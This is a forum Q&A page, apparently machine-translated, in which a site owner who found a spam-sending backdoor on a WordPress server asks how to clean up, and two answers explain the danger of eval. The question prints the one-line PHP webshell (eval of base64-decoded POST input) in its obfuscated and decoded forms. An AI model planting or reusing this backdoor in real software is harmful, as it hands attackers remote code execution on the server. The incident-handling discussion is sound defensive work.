Geek Answers Handbook

A malicious PHP file found on my web server needs to clean up help and prevent this event from happening again

My hosting provider recently suspended my site because something on it sent a huge amount of spam emails. Initially, I and the vendor believed that this was due to the unsecured form for the email campaign that I put on the server a couple of days ago. I deleted the form page from the server, but the server still sent spam messages.

I found a php file named 7c32.php in the "css" folder in the server root. I definitely did not. Here is the code that was in the file:

<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>

After running through an online decoder, this is what it came across:

 if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));

I read about malicious php files and saw that the eval lines (and base64_decode were very suspicious). I looked at the server log file and saw some mail requests with this 7c32.php file coming from the ip address from Saudi Arabia.

I deleted the php file, updated all obsolete Wordpress themes and plugins (as well as the platform itself, and changed the password to the FTP server and Wordpress administrative account to something much more secure.

Is there anything else to keep my server secure? I am going to find these base64 and eval (lines in every other php file on the server, but apart from that I have no ideas.

This php script seems too short to do any damage, but what else can send all this spam mail?

Any help would be greatly appreciated.

+8
security php wordpress malware spam
source share
2 answers

eval() is a very dangerous little language construct, because it can execute almost any part of the PHP code passed to it as a string, so, of course, it may be that the script sends mail, although sending spam is actually as non-destructive as possible eval() .

If your page had permissions to delete each file in the root directory of your website, eval() could also do this, simply by sending the correct command to the script via POST.

If you really want to make sure that this is part of the code sending the mail, return it, but change it to your advantage. Stop it with eval() and instead save the POST data in a database or text file. This is the only way to find out what exactly this code is used.

+2
source share

This php script seems too short to do any damage, but what else can send all this spam mail?

Do you think this code is too short for demage? This is the worst code with eval ()

The construction of the eval () language is very dangerous because it allows you to execute arbitrary PHP code. Therefore, its use is not recommended. If you have carefully checked that there is no other choice than to use this design, pay special attention not to transfer any data provided by the user without a preliminary check.

They can execute any PHP code using this code too short . Eval - EVIL. Do not allow file download permissions without verification

but what else can send all this spam mail?

The same eval code sends emails. They send him an email code, and he takes turns executing it and sends an email

+1
source share

More articles:


All Articles